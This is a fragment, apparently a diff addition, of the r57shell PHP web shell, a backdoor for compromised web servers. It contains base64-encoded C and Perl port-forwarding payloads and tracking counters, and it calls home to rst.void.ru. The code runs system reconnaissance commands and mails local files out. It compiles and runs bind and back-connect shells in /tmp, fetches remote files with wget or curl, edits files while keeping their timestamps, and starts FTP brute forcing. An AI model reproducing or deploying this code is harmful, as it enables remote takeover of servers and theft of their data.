+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else  
+  {	
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }  
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}  
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix) 
+ { 
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; 
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."safe_mode: <b>";
+echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>".ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b><br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';	
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");	
+ err(6+$res);
+ $_POST['cmd']="";  
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {  
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else 
+  {	
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";                   	
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { err(3); }
+ else 
+  {   	
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else 
+   {	
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);	}
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);	}
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }	
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
